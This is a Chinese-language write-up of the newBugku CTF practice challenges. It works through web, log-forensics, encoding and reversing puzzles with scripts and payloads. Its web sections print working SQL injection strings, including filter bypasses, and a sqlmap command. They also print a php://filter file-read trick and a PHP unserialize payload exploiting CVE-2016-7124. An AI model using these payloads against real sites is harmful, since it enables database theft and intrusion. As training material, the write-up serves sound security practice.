newBugku wp

题目出的很有意思,啊!好菜啊!

web1

extract变量覆盖,构造:

?a

即可

web2

手速问题,脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests

url = 'http://123.206.31.85:10002/'
s = requests.session()
req = s.get(url).text
a = req.find('哦')
b = req.find('</p>')
exp = req[a+7:b]
sum = eval(exp)
print(sum)
data = {'result':'%d'%sum}
final = s.post(url,data)
print(final.text)

web3

上传了文件,但是不知道要怎么做

注意到op=upload,使用php伪协议

op=php://filter/read=convert.base64-encode/resource=flag

将得到的base64解码

web4

使用or

'or 1=1#
asdf

web5

sql注入题,直接用sqlmap跑出来

python2 sqlmap.py -u "http://47.95.208.167:10005/?mod=read&id=2" --dump

或者直接构造整型的payload

id=0 union select 1,2,flag,3 from flag

web6

查看源代码,在最下面发现

进行base64解码后,是test123

进行登录,由于是管理员系统,尝试用户名为admin,密码为test123

但点击登录后,提示:

则进行抓包,添加XFF头:

web7

抓包

若直接Go,会返回:

Set-Cookie: u=351e76680321232f297a57a5a743894a0e4a801fc3
Set-Cookie: r=351e766803d63c7ede8cb1e1c8db5e51c63fd47cff

Welcome limited user!  你的权限不够!

将admin进行md5加密,为:

21232f297a57a5a743894a0e4a801fc3

则将r=351e766803d63c7ede8cb1e1c8db5e51c63fd47cff改为

r=351e76680321232f297a57a5a743894a0e4a801fc3

再次GO,成功返回flag

web8

由于年龄的输入框限制了只能输数字,则需要更改一下页面源代码

输入 1^1,点击更新资料后

则年龄处存在整型注入

1.获取当前数据库名

hex(database())

更新后显示

77656238

转换成字符后为

web8

2.获取表名

hex(select group_concat(table_name) from information_schema.tables where table_schema=database())

显示更新错误,后来才知道要在外面再加一层括号

hex((select group_concat(table_name) from information_schema.tables where table_schema=database()))

更新后显示

7573657273

转换成字符后为

users

3.获取表字段名

hex((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273))

更新后显示

数据太大,没有在输入框显示,在下方源代码中,转换成字符后为

id,username,password,nickname,age,description

4.获取数据

使用

hex((select description from users where username=0x61646D696E limit 0,1))

这句话显示错误。。。想不明白

看到交流群有大佬发的语句,改成

hex((select description from (select * from users where username=0x61646D696E limit 0,1) as b))

得到flag,不过最后一步还是不懂为什么要这样构造。。。

web9

用脚本,put提交内容bugku

1
2
3
4
5
import requests

url = 'http://123.206.31.85:3031/'
req = s.put(url,data='bugku')
print(req.text)

之后进行base64解密

web11

查看源代码,在head标签发现提示

进入robots.txt

User-agent: *
Disallow: /shell.php

则进入shell.php去看看

是个md5截断的问题,在网上搜到的一个脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import hashlib
from multiprocessing.dummy import Pool as ThreadPool


def md5(s): # 计算MD5字符串
return hashlib.md5(str(s).encode('utf-8')).hexdigest()


keymd5 = input('请输入截断后的md5值') #已知的md5截断值
md5start = 0 # 设置题目已知的截断位置
md5length = 6

def findmd5(sss): # 输入范围 里面会进行md5测试
key = sss.split(':')
start = int(key[0]) # 开始位置
end = int(key[1]) # 结束位置
result = 0
for i in range(start, end):
# print(md5(i)[md5start:md5length])
if md5(i)[0:6] == keymd5: # 拿到加密字符串
result = i
print(result) # 打印
break


list=[] # 参数列表
for i in range(10): # 多线程的数字列表 开始与结尾
list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = ThreadPool() # 多线程任务
pool.map(findmd5, list) # 函数 与参数列表
pool.close()
pool.join()

web12

查看页面源代码

class Time{
    public $flag = ******************;
    public $truepassword = ******************;
    public $time;
    public $password ;
    public function __construct($tt, $pp) {
    $this->time = $tt;
    $this->password = $pp;
    }
    function __destruct(){
        if(!empty($this->password))
        {
            if(strcmp($this->password,$this->truepassword)==0){
                echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";
                if(!empty($this->time)){
                    if(!is_numeric($this->time)){
                        echo 'Sorry.<br>';
                        show_source(__FILE__);
                    }
                    else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){
                        echo 'you need a bigger time.<br>';
                    }
                    else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){
                        echo 'you need a smaller time.<br>';
                    }
                    else{
                        sleep((int)$this->time);
                        var_dump($this->flag);
                    }
                    echo '<hr>';
                }
                else{
                    echo '<h1>you have no time!!!!!</h1><br>';
                }
            }
            else{
                echo '<h1>Password is wrong............</h1><br>';
            }
        }
        else{
            echo "<h1>Please input password..........</h1><br>";
        }
    }
    function __wakeup(){
        $this->password = 1; echo 'hello hacker,I have changed your password and time, rua!';
    }
}
if(isset($_GET['rua'])){
    $rua = $_GET['rua'];
    @unserialize($rua);
}
else{
    echo "<h1>Please don't stop rua 233333</h1><br>";
}

代码由Time类,一个if else语句构成,要传入rua这个参数,然后进行反序列化

Time类中的password的值要和设好的turepassword的值进行比较,要相等,由于用到了strcmp,则使用数组即可绕过;time的值不能大于也不能小于66 * 55 * 44 * 33 * 23 * 11,因此相等即可,但有个sleep函数,因此使用16进制绕过(或科学计数法)

如何序列化

变量类型:类名长度:类名:属性数量:{属性类型:属性名长度:属性名;属性值类型:属性值长度:属性值内容}

这里利用了一个bug:

__wakeup()魔术方法绕过(CVE-2016-7124)

当序列化字符串中表示对象的属性的个数大于真实的属性个数时会跳过 __wakeup 函数的执行

漏洞影响版本:

PHP5 < 5.6.25
PHP7 < 7.0.10

构造:

?rua=O:4:"Time":4:{s:4:"time";s:10:"0x4c06f350";s:8:"password";a:1:{i:0;i:1;}}

本来只需构造两个属性,改为四个,则利用了这个bug,即可绕过__wakeup()

感谢大佬的文章:

https://blog.csdn.net/weixin_42348709/article/details/84895343

web13

这道题比较坑的地方是得到的flag要将括号去掉然后提交

脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import requests
import base64

s = requests.session()

url = 'http://123.206.31.85:10013/index.php'
req = s.get(url)
flag = req.headers['Password']
flag = base64.b64decode(flag).decode('utf-8')
flag = flag[5:-1]
data = {'password':'%s'%flag}
print(data)
res = s.post(url,data)
print(res.text)
print(res.headers)

web14

听说备份了不少东西呢

git源码泄露,使用GitHack扫描

web18

Sql injection

这道题为get 字符型注入,把井号#过滤了,不过没想到用

--+

这个注释符-_-

1.获取表名

?id=0'ununionion seleselectc 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

得到

ctf,flag

2.获取字段名

?id=0'ununionion seleselectct 1,2,group_concat(column_name) from  infoorrmation_schema.columns where table_name='flag'--+

得到

id,flag

3.获取flag

?id=0' ununionion seleselectct 1,2,flag from flag--+

web24

扫描一波,发现有/index目录,进去后是代码审计,构造出反序列化即可

不过这里有点坑,它先进行了一次解密,也就是构造私有属性的反序列化时,不能用%xx的形式来做了,python脚本:

1
2
3
4
5
6
7
8
a = '0x00'
a = chr(int(a, 16))
payload = 'O:18:"Small_white_rabbit":3:{s:24:"' + a + 'Small_white_rabbit' + a + 'file";s:12:"the_f1ag.php";}'

import base64

var = base64.b64encode(payload.encode('utf-8'))
print(var)

二维码

打开txt文件,发现是data URI scheme,复制到浏览器,得到解压密码

解压文件,得到160张二维码,使用微微二维码扫码工具批量扫描(还可以根据文件大小来得到信息)

不过得到的信息在Excel文件中。。

左边是文件名,右边是对应的解码信息,发现都是1和0,按照文件名顺序进行排序,之后删除第一列,再用脚本提取出来:

1
2
3
4
5
6
7
8
9
10
f = open('C:\\Users\\腾飞\\Desktop\\a\\a.csv')
a = f.readlines()
b = []
for i in a:
i = i.replace('\n','')
b.append(i)
s = ''
for i in b:
s+=i
print(s)

得到的为:

0110011001101100011000010110011101111011010100010101001001100011011011110110010001100101001100010111001101010101011100110110010101100110011101010110110001111101

之后进行8位一组转ascii

日志审计

从日志中找出黑客攻击的痕迹

下载下来,打开后有很多记录:

搜索‘flag’这个关键字,出现了一些记录:

发现这些记录经过了url编码,进行解码:

发现这些记录是进行SQL注入时使用的,则将这些注入用到的ascii的对应的十进制的值转换为ascii,用脚本提取:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
data = '''192.168.0.1 - - [13/Oct/2018:12:38:14  0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),1,1))=102-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),2,1))=108-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),3,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),4,1))=103-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),5,1))=123-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),6,1))=109-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),7,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),8,1))=121-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),9,1))=105-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),10,1))=121-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),11,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),12,1))=104-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),13,1))=101-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),14,1))=105-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),15,1))=49-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),16,1))=57-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),17,1))=54-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),18,1))=53-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),19,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),20,1))=101-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),21,1))=55-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),22,1))=53-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),23,1))=54-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),24,1))=57-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),38,1))=125-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
'''

import re

a = re.findall('LIMIT.*?=(.*?)--',data)
for i in a:
i = int(i)
print(chr(i),end='')

神奇的字符串

有一串神奇的字符串bE0veldtTDs7NzlTe3hzbSFYSj5Sa2U6eyQ4NyVrI3FvWFU6Qls7QlVK,还有一张纸条写着589164

先用base64解密,得到:

lM/zWmL;;79S{xsm!XJ>Rke:{$87%k#qoXU:B[;BUJ

很杂乱的字符串,想到提示589164,既然有base64,那么提示的意思就是:

base58,base91,base64

先base91解密,再base58解密

你真的了解base的原理吗

hint:Python ! Python ! Python! Python!

那么多字符串,电脑卡的一批!!!!

后来想起来提示,我可以不用进行复制粘贴进行解码啊,可以先把密文下载下来,再用函数对文件读写再解码,嘻嘻~

开始的加密方式为base85,解码后为base64,然后为16进制,再转字符串,循环…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import base64

url = 'C:/Users/腾飞/Desktop/base_python.txt'
f = open(url)
content = f.readlines()
content = content[0]

first = base64.b85decode(content).decode('utf-8')
second = base64.b64decode(first).decode('utf-8')
third = ''.join([chr(int(b, 16)) for b in [second[i:i+2] for i in range(0, len(second), 2)]])

first1 = base64.b85decode(third).decode('utf-8')
second1 = base64.b64decode(first1).decode('utf-8')
third1 = ''.join([chr(int(b, 16)) for b in [second1[i:i+2] for i in range(0, len(second1), 2)]])

first2 = base64.b85decode(third1).decode('utf-8')
second2 = base64.b64decode(first2).decode('utf-8')
third2 = ''.join([chr(int(b, 16)) for b in [second2[i:i+2] for i in range(0, len(second2), 2)]])

first3 = base64.b85decode(third2).decode('utf-8')
second3 = base64.b64decode(first3).decode('utf-8')
third3 = ''.join([chr(int(b, 16)) for b in [second3[i:i+2] for i in range(0, len(second3), 2)]])

first4 = base64.b85decode(third3).decode('utf-8')
second4 = base64.b64decode(first4).decode('utf-8')
third4 = ''.join([chr(int(b, 16)) for b in [second4[i:i+2] for i in range(0, len(second4), 2)]])

first5 = base64.b85decode(third4).decode('utf-8')
second5 = base64.b64decode(first5).decode('utf-8')
third5 = ''.join([chr(int(b, 16)) for b in [second5[i:i+2] for i in range(0, len(second5), 2)]])

first6 = base64.b85decode(third5).decode('utf-8')
second6 = base64.b64decode(first6).decode('utf-8')
third6 = ''.join([chr(int(b, 16)) for b in [second6[i:i+2] for i in range(0, len(second6), 2)]])

first7 = base64.b85decode(third6).decode('utf-8')
second7 = base64.b64decode(first7).decode('utf-8')
third7 = ''.join([chr(int(b, 16)) for b in [second7[i:i+2] for i in range(0, len(second7), 2)]])

first8 = base64.b85decode(third7).decode('utf-8')
second8 = base64.b64decode(first8).decode('utf-8')
third8 = ''.join([chr(int(b, 16)) for b in [second8[i:i+2] for i in range(0, len(second8), 2)]])

first9 = base64.b85decode(third8).decode('utf-8')
second9 = base64.b64decode(first9).decode('utf-8')
third9 = ''.join([chr(int(b, 16)) for b in [second9[i:i+2] for i in range(0, len(second9), 2)]])
print(third9)

txt500

看了wp想不明白为什么关键字是key而不是flag,why!!!

1
2
3
4
5
6
7
8
9
10
11
import os
path = 'C:/Users/腾飞/Desktop/flag/'
keyvalue = input('请输入key: ')
for root, dirs, files in os.walk(path):
for file in files:
file = path + file
f = open(file, 'r')
content = f.readlines()
content = ''.join(content)
if keyvalue in content:
print(file)

输入 key{ ,得到一个文件夹,再打开搜索即可,提交时还要把key换成flag。。

P:使用linux的grep进行搜索也可以

流量分析

找到一条使用的tcp协议,然后tcp流量追踪

被截获的电报

一个音频文件,滴答声,为摩斯密码,使用Audacity这款音频编辑录音软件打开

其中比较窄的线为. 比较宽的线为- 中间间隔大的需要加上空格

得到

.- -.-. - .. ----- -. --.- ..- .. -.-. -.-

摩斯密码解码,将flag中的英文字母大写提交

头像

用010editor打开,但是头尾都没有发现flag,看了wp发现flag在中间?emmm

按ctrl+F,选择text,输入flag进行搜索

将找到的flag中间进行base解码再md5加密

进制转换

1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331

观察数字可发现: 每一位的数都不超过4,则为4进制,先转换为10进制,再转换为ascii字符

1
2
3
4
5
strings = '1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331
lists = strings.split(' ')
for i in lists:
i = int(i, base=4)
print(chr(i), end='')

Snake

太形象了这题

先使用foremost分离出class文件,再进行jad反编译,在文件源码中搜索flag时在Game.jad文件有所发现有这样一段代码:

if(score >= 500 && isshow)
        {
            String flag = "eobdxpmbhf\\jpgYaiibYagkc{";
            int key = snake.len - score;    3
            String xx = "";
            for(int i = 0; i < flag.length() / 2; i++)
            {
                char c = flag.charAt(i);
                c ^= key;
                xx = (new StringBuilder(String.valueOf(xx))).append(c).toString();
            }

            for(int i = flag.length() / 2 + 1; i < flag.length(); i++)
            {
                char c = flag.charAt(i);
                c ^= key * 2;
                xx = (new StringBuilder(String.valueOf(xx))).append(c).toString();
            }

            JOptionPane.showInputDialog(null, "This is your flag CALCULATE BY YOUR SCORE:\n", "Congratulations", -1, null, null, xx);
            isshow = false;
        }

没学过java,不过这段代码还是不难的,搜索了一波不认识的函数:

1.charAt() 方法用于返回指定索引处的字符。索引范围为从 0 到 length() - 1


2.StringBuilder是一个类,可以用来处理字符串,最简单的用法:
StringBuilder sb=new StringBuilder();
sb.Append("123");
sb.Append("456");
string str=sb.ToString();
最后得到的str字符串的值就是"123456"

3.String.valueOf(b) : 将变量 b 转换成字符串 

key的值在游戏中即可算出:初始的时候蛇长度为3,吃一个食物长度加一,则key为3

用python表示出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
flag = "eobdxpmbhf\\jpgYaiibYagkc{"
key = 3
xx = ""
length = len(flag)
for i in range(0, length//2):
c = ord(flag[i])
c ^= key
xx += chr(c)

print(xx)

for i in range(length//2+1, length):
c = ord(flag[i])
c ^= key*2
xx += chr(c)

print(xx)